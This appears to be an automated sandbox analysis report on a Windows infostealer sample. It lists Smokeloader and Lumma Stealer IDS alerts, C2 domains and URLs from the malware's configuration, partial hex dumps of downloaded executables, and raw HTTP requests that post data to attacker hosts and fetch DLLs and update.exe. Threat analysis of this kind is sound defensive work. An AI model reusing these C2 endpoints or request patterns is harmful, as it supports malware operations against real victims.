Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then jmp dword ptr [004421CCh]	6_2_0210CF1A
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000080h]	6_2_02115F55
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov ecx, dword ptr [esp+000000A0h]	6_2_02111C89
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then jmp edx	6_2_02112D5B
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then mov eax, dword ptr [esp+4Ch]	6_2_02105D61
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	6_2_020FCD77

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49736 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49737 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49738 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49739 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49740 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49741 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49743 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49744 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2052787 ET TROJAN DNS Query to Lumma Stealer Domain (whispedwoodmoodsksl .shop) 192.168.2.4:52163 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49746 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49748 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52655 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52656 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52658 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52693 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52694 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52695 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52696 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52697 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52698 -> 190.28.110.209:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52736 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52737 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52738 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52739 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52740 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52741 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52742 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52743 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52744 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52745 -> 185.18.245.58:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:52746 -> 185.18.245.58:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.28.110.209 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.124 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.18.245.58 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: boredimperissvieos.shop
Source: Malware configuration extractor	URLs: holicisticscrarws.shop
Source: Malware configuration extractor	URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor	URLs: plaintediousidowsko.shop
Source: Malware configuration extractor	URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor	URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor	URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor	URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor	URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor	URLs: boredimperissvieos.shop
Source: Malware configuration extractor	URLs: holicisticscrarws.shop
Source: Malware configuration extractor	URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor	URLs: plaintediousidowsko.shop
Source: Malware configuration extractor	URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor	URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor	URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor	URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor	URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor	URLs: boredimperissvieos.shop
Source: Malware configuration extractor	URLs: boredimperissvieos.shop
Source: Malware configuration extractor	URLs: holicisticscrarws.shop
Source: Malware configuration extractor	URLs: sweetsquarediaslw.shop
Source: Malware configuration extractor	URLs: plaintediousidowsko.shop
Source: Malware configuration extractor	URLs: miniaturefinerninewjs.shop
Source: Malware configuration extractor	URLs: zippyfinickysofwps.shop
Source: Malware configuration extractor	URLs: obsceneclassyjuwks.shop
Source: Malware configuration extractor	URLs: acceptabledcooeprs.shop
Source: Malware configuration extractor	URLs: whispedwoodmoodsksl.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199689717899
Source: Malware configuration extractor	URLs: http://dbfhns.in/tmp/index.php
Source: Malware configuration extractor	URLs: http://guteyr.cc/tmp/index.php
Source: Malware configuration extractor	URLs: http://greendag.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://lobulraualov.in.net/tmp/index.php

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 26 May 2024 08:22:31 GMTContent-Type: application/octet-streamContent-Length: 325120Last-Modified: Sun, 26 May 2024 08:20:02 GMTConnection: keep-aliveETag: "6652f0b2-4f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 5b 37 b0 84 3a 59 e3 84 3a 59 e3 84 3a 59 e3 89 68 86 e3 98 3a 59 e3 89 68 b9 e3 09 3a 59 e3 89 68 b8 e3 aa 3a 59 e3 8d 42 ca e3 8d 3a 59 e3 84 3a 58 e3 e7 3a 59 e3 31 a4 bc e3 85 3a 59 e3 89 68 82 e3 85 3a 59 e3 31 a4 87 e3 85 3a 59 e3 52 69 63 68 84 3a 59 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e 81 f9 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 0c 01 00 00 74 08 00 00 00 00 00 86 3d 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 09 00 00 04 00 00 70 bc 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 83 01 00 64 00 00 00 00 e0 08 00 08 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 84 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 78 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 0b 01 00 00 10 00 00 00 0c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 02 6c 00 00 00 20 01 00 00 6e 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 46 07 00 00 90 01 00 00 ce 02 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 a8 00 00 00 e0 08 00 00 aa 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 26 May 2024 08:23:01 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 26 May 2024 08:16:06 GMTETag: "205e00-619570326fd80"Accept-Ranges: bytesContent-Length: 2121216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 0a 09 00 00 50 17 00 00 00 00 00 1c 18 09 00 00 10 00 00 00 20 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 20 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 4a 22 00 00 00 70 0a 00 00 44 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 3c bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 84 08 09 00 00 10 00 00 00 0a 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 c4 26 00 00 00 20 09 00 00 28 00 00 00 0e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 2d 0d 00 00 00 50 09 00 00 00 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 4a 22 00 00 00 60 09 00 00 24 00 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 90 09 00 00 00 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 a0 09 00 00 02 00 00 00 5a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 3c bd 00 00 00 b0 09 00 00 be 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 44 16 00 00 70 0a 00 00 44 16 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 20 00 00 00 00 00 00 5e 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.102.42.29 104.102.42.29
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 185.235.137.54 185.235.137.54
Source: Joe Sandbox View	IP Address: 185.235.137.54 185.235.137.54

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: UNINETAZ UNINETAZ

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 74Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7083Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1230Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 582478Host: whispedwoodmoodsksl.shop
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 5645Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGCFBGCBFHJECBGDAKKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJEGHDAECAKECAFCAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEHCFHJJJJECAAFBKJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 129229Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xdtlvnnwnlpkuygk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ytvhsyvyrbixtfi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://txpgggtypbkripei.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nwyllkfdfrdb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jpbahollcwbghe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: dbfhns.in
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oygcwhbcxoopv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: dbfhns.in
Source: global traffic	HTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fjtoifbsexibjqos.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: dbfhns.in
